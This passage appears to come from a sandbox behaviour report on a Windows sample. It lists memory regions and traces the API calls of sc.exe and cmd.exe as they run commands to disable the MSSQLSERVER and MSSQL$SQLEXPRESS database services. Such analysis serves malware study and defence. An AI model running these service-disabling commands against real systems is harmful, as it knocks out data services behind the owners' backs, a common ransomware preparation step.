"Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5844 start_va = 0x970000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 5845 start_va = 0x990000 end_va = 0x991fff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 5846 start_va = 0x9a0000 end_va = 0x9b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 5847 start_va = 0x9c0000 end_va = 0x9fffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 5848 start_va = 0xa00000 end_va = 0xa3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 5849 start_va = 0xa40000 end_va = 0xa43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 5850 start_va = 0xa50000 end_va = 0xa50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 5851 start_va = 0xa60000 end_va = 0xa61fff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 5852 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 5853 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 5854 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5855 start_va = 0x7f5c0000 end_va = 0x7f5e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5c0000" filename = "" Region: id = 5856 start_va = 0x7f5e8000 end_va = 0x7f5e8fff entry_point = 0x0 region_type = private name = "private_0x000000007f5e8000" filename = "" Region: id = 5857 start_va = 0x7f5ec000 end_va = 0x7f5ecfff entry_point = 0x0 region_type = private name = "private_0x000000007f5ec000" filename = "" Region: id = 5858 start_va = 0x7f5ed000 end_va = 0x7f5effff entry_point = 0x0 region_type = private name = "private_0x000000007f5ed000" filename = "" Region: id = 5859 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5860 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5861 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5862 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5863 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5864 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 5865 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5866 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5867 start_va = 0xba0000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 5868 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5869 start_va = 0x970000 end_va = 0x97ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 5870 start_va = 0x980000 end_va = 0x983fff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 5871 start_va = 0xaa0000 end_va = 0xb5dfff entry_point = 0xaa0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5872 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 5873 start_va = 0xca0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 5874 start_va = 0xd00000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 5875 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5876 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5877 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5878 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5879 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5880 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5881 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5882 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5883 start_va = 0x7f4c0000 end_va = 0x7f5bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4c0000" filename = "" Region: id = 5884 start_va = 0x7f5e9000 end_va = 0x7f5ebfff entry_point = 0x0 region_type = private name = "private_0x000000007f5e9000" filename = "" Region: id = 5885 start_va = 0xd10000 end_va = 0xdeefff entry_point = 0xd10000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5886 start_va = 0xa70000 end_va = 0xa81fff entry_point = 0xa70000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 375 os_tid = 0xdbc [0127.459] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0127.459] __set_app_type (_Type=0x1) [0127.459] __p__fmode () returned 0x77ac4d6c [0127.459] __p__commode () returned 0x77ac5b1c [0127.459] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0127.460] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0127.460] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.462] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0127.462] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0127.462] _wcsicmp (_String1="config", _String2="query") returned -14 [0127.462] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0127.462] _wcsicmp (_String1="config", _String2="start") returned -16 [0127.462] _wcsicmp (_String1="config", _String2="pause") returned -13 [0127.462] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0127.462] _wcsicmp (_String1="config", _String2="control") returned -14 [0127.462] _wcsicmp (_String1="config", _String2="continue") returned -14 [0127.462] _wcsicmp (_String1="config", _String2="stop") returned -16 [0127.462] _wcsicmp (_String1="config", _String2="config") returned 0 [0127.462] ResolveDelayLoadedAPI () returned 0x77262c10 [0127.462] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xba8530 [0127.464] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0127.464] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0127.464] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0127.464] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0127.464] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0127.464] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0127.464] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0127.464] OpenServiceW (hSCManager=0xba8530, lpServiceName="MSSQLSERVER", dwDesiredAccess=0x3) returned 0x0 [0127.464] GetLastError () returned 0x424 [0127.464] _ultow (in: _Dest=0x424, _Radix=10745336 | out: _Dest=0x424) returned="1060" [0127.464] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0127.466] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xa3f5d4, nSize=0x2, Arguments=0xa3f5ec | out: lpBuffer="裀º£蔔è") returned 0x62 [0127.466] GetFileType (hFile=0x3c) returned 0x2 [0127.466] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa3f5b8 | out: lpMode=0xa3f5b8) returned 1 [0127.466] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xba88c0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xa3f5c8, lpReserved=0x0 | out: lpBuffer=0xba88c0*, lpNumberOfCharsWritten=0xa3f5c8*=0x62) returned 1 [0127.467] LocalFree (hMem=0xba88c0) returned 0x0 [0127.467] LocalFree (hMem=0x0) returned 0x0 [0127.467] CloseServiceHandle (hSCObject=0xba8530) returned 1 [0127.467] LocalFree (hMem=0x0) returned 0x0 [0127.467] exit (_Code=1060) Thread: id = 376 os_tid = 0xda0 Process: id = "95" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x24995000" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSSQL$SQLEXPRESS start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5887 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5888 start_va = 0xc30000 end_va = 0x4c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 5889 start_va = 0x4c30000 end_va = 0x4c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c30000" filename = "" Region: id = 5890 start_va = 0x4c50000 end_va = 0x4c50fff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 5891 start_va = 0x4c60000 end_va = 0x4c73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c60000" filename = "" Region: id = 5892 start_va = 0x4c80000 end_va = 0x4cbffff entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 5893 start_va = 0x4cc0000 end_va = 0x4dbffff entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 5894 start_va = 0x4dc0000 end_va = 0x4dc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dc0000" filename = "" Region: id = 5895 start_va = 0x4dd0000 end_va = 0x4dd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dd0000" filename = "" Region: id = 5896 start_va = 0x4de0000 end_va = 0x4de1fff entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 5897 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5898 start_va = 0x7ee00000 end_va = 0x7ee22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee00000" filename = "" Region: id = 5899 start_va = 0x7ee28000 end_va = 0x7ee28fff entry_point = 0x0 region_type = private name = "private_0x000000007ee28000" filename = "" Region: id = 5900 start_va = 0x7ee2b000 end_va = 0x7ee2bfff entry_point = 0x0 region_type = private name = "private_0x000000007ee2b000" filename = "" Region: id = 5901 start_va = 0x7ee2d000 end_va = 0x7ee2ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee2d000" filename = "" Region: id = 5902 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5903 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5904 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5905 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5906 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5907 start_va = 0x4e20000 end_va = 0x4e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 5908 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5909 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5910 start_va = 0x4e40000 end_va = 0x4f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e40000" filename = "" Region: id = 5911 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5952 start_va = 0x4c30000 end_va = 0x4c3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c30000" filename = "" Region: id = 5953 start_va = 0x4f40000 end_va = 0x4ffdfff entry_point = 0x4f40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5954 start_va = 0x5000000 end_va = 0x503ffff entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 5955 start_va = 0x5040000 end_va = 0x513ffff entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 5956 start_va = 0x5280000 end_va = 0x528ffff entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 5957 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5958 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5959 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5960 start_va = 0x7ed00000 end_va = 0x7edfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed00000" filename = "" Region: id = 5961 start_va = 0x7ee25000 end_va = 0x7ee27fff entry_point = 0x0 region_type = private name = "private_0x000000007ee25000" filename = "" Region: id = 5962 start_va = 0x4c40000 end_va = 0x4c43fff entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 5963 start_va = 0x4c50000 end_va = 0x4c53fff entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 5964 start_va = 0x5290000 end_va = 0x55c6fff entry_point = 0x5290000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 377 os_tid = 0xda8 [0127.614] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0127.614] __set_app_type (_Type=0x1) [0127.614] __p__fmode () returned 0x77ac4d6c [0127.614] __p__commode () returned 0x77ac5b1c [0127.614] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0127.614] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0127.614] GetCurrentThreadId () returned 0xda8 [0127.614] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xda8) returned 0x84 [0127.614] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0127.614] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0127.614] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.617] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.617] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4dbf8a0 | out: phkResult=0x4dbf8a0*=0x0) returned 0x2 [0127.617] VirtualQuery (in: lpAddress=0x4dbf8a7, lpBuffer=0x4dbf858, dwLength=0x1c | out: lpBuffer=0x4dbf858*(BaseAddress=0x4dbf000, AllocationBase=0x4cc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.617] VirtualQuery (in: lpAddress=0x4cc0000, lpBuffer=0x4dbf858, dwLength=0x1c | out: lpBuffer=0x4dbf858*(BaseAddress=0x4cc0000, AllocationBase=0x4cc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.618] VirtualQuery (in: lpAddress=0x4cc1000, lpBuffer=0x4dbf858, dwLength=0x1c | out: lpBuffer=0x4dbf858*(BaseAddress=0x4cc1000, AllocationBase=0x4cc0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.618] VirtualQuery (in: lpAddress=0x4cc3000, lpBuffer=0x4dbf858, dwLength=0x1c | out: lpBuffer=0x4dbf858*(BaseAddress=0x4cc3000, AllocationBase=0x4cc0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.618] VirtualQuery (in: lpAddress=0x4dc0000, lpBuffer=0x4dbf858, dwLength=0x1c | out: lpBuffer=0x4dbf858*(BaseAddress=0x4dc0000, AllocationBase=0x4dc0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0127.618] GetConsoleOutputCP () returned 0x1b5 [0127.618] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0127.618] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0127.618] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.618] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0127.618] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.618] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0127.619] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.619] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0127.619] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.619] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0127.619] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.619] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0127.620] GetEnvironmentStringsW () returned 0x4e47d98* [0127.620] FreeEnvironmentStringsA (penv="A") returned 1 [0127.620] GetEnvironmentStringsW () returned 0x4e47d98* [0127.620] FreeEnvironmentStringsA (penv="A") returned 1 [0127.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4dbe804 | out: phkResult=0x4dbe804*=0x94) returned 0x0 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x0, lpData=0x4dbe810*=0xe8, lpcbData=0x4dbe80c*=0x1000) returned 0x2 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x4, lpData=0x4dbe810*=0x1, lpcbData=0x4dbe80c*=0x4) returned 0x0 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x0, lpData=0x4dbe810*=0x1, lpcbData=0x4dbe80c*=0x1000) returned 0x2 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x4, lpData=0x4dbe810*=0x0, lpcbData=0x4dbe80c*=0x4) returned 0x0 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x4, lpData=0x4dbe810*=0x40, lpcbData=0x4dbe80c*=0x4) returned 0x0 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x4, lpData=0x4dbe810*=0x40, lpcbData=0x4dbe80c*=0x4) returned 0x0 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x0, lpData=0x4dbe810*=0x40, lpcbData=0x4dbe80c*=0x1000) returned 0x2 [0127.620] RegCloseKey (hKey=0x94) returned 0x0 [0127.620] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4dbe804 | out: phkResult=0x4dbe804*=0x94) returned 0x0 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x0, lpData=0x4dbe810*=0x40, lpcbData=0x4dbe80c*=0x1000) returned 0x2 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x4, lpData=0x4dbe810*=0x1, lpcbData=0x4dbe80c*=0x4) returned 0x0 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x0, lpData=0x4dbe810*=0x1, lpcbData=0x4dbe80c*=0x1000) returned 0x2 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x4, lpData=0x4dbe810*=0x0, lpcbData=0x4dbe80c*=0x4) returned 0x0 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x4, lpData=0x4dbe810*=0x9, lpcbData=0x4dbe80c*=0x4) returned 0x0 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x4, lpData=0x4dbe810*=0x9, lpcbData=0x4dbe80c*=0x4) returned 0x0 [0127.620] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4dbe808, lpData=0x4dbe810, lpcbData=0x4dbe80c*=0x1000 | out: lpType=0x4dbe808*=0x0, lpData=0x4dbe810*=0x9, lpcbData=0x4dbe80c*=0x1000) returned 0x2 [0127.620] RegCloseKey (hKey=0x94) returned 0x0 [0127.620] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29830 [0127.620] srand (_Seed=0x5ad29830) [0127.621] GetCommandLineW () returned="/c sc config MSSQL$SQLEXPRESS start= disabled" [0127.621] GetCommandLineW () returned="/c sc config MSSQL$SQLEXPRESS start= disabled" [0127.621] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0127.621] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e49cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0127.621] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: 